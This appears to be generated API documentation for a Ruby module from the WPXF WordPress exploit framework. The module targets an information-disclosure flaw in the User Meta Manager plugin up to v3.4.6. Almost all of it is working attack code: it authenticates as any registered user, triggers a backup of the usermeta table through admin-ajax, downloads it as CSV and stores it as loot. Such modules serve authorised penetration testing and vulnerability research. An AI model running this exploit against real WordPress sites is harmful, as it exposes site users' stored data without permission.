class Wpxf::Auxiliary::UserMetaManagerInformationDisclosure

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::Module::new
# File lib/wpxf/modules/auxiliary/info/user_meta_manager_information_disclosure.rb, line 9
def initialize
  super

  update_info(
    name: 'User Meta Manager <= 3.4.6 Information Disclosure',
    desc: %(
      The User Meta Manager plugin up to and including v3.4.6,
      suffers from an information disclosure vulnerability.
      Any registered user can perform a series of AJAX requests,
      in order to get all the contents of the `usermeta` table.
    ),
    author: [
      'Panagiotis Vagenas', # Disclosure
      'rastating'           # WPXF module
    ],
    references: [
      ['WPVDB', '8384'],
      ['URL', 'http://seclists.org/bugtraq/2016/Feb/48']
    ],
    date: 'Feb 01 2016'
  )

  register_options([
    StringOption.new(
      name: 'username',
      desc: 'The WordPress username to authenticate with',
      required: true
    ),
    StringOption.new(
      name: 'password',
      desc: 'The WordPress password to authenticate with',
      required: true
    )
  ])
end

Public Instance Methods

backup_table(cookie) click to toggle source
# File lib/wpxf/modules/auxiliary/info/user_meta_manager_information_disclosure.rb, line 57
def backup_table(cookie)
  execute_get_request(
    url: wordpress_url_admin_ajax,
    cookie: cookie,
    params: {
      'action' => 'umm_switch_action',
      'umm_sub_action' => 'umm_backup'
    }
  )
end
check() click to toggle source
# File lib/wpxf/modules/auxiliary/info/user_meta_manager_information_disclosure.rb, line 53
def check
  check_plugin_version_from_readme('user-meta-manager', '3.4.7')
end
download_backup(cookie) click to toggle source
# File lib/wpxf/modules/auxiliary/info/user_meta_manager_information_disclosure.rb, line 68
def download_backup(cookie)
  execute_get_request(
    url: wordpress_url_admin_ajax,
    cookie: cookie,
    params: {
      'action' => 'umm_switch_action',
      'umm_sub_action' => 'umm_get_csv'
    }
  )
end
password() click to toggle source
# File lib/wpxf/modules/auxiliary/info/user_meta_manager_information_disclosure.rb, line 49
def password
  datastore['password']
end
run() click to toggle source
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/auxiliary/info/user_meta_manager_information_disclosure.rb, line 79
def run
  return false unless super

  cookie = authenticate_with_wordpress(username, password)
  return false unless cookie

  emit_info 'Creating table backup...'
  backup_table(cookie)

  emit_info 'Downloading table backup...'
  res = download_backup(cookie)

  loot = export_and_log_loot res.body, 'Backup of the usermeta table', 'backup', '.csv'
  emit_success "Downloaded backup to #{loot.path}"

  true
end
username() click to toggle source
# File lib/wpxf/modules/auxiliary/info/user_meta_manager_information_disclosure.rb, line 45
def username
  datastore['username']
end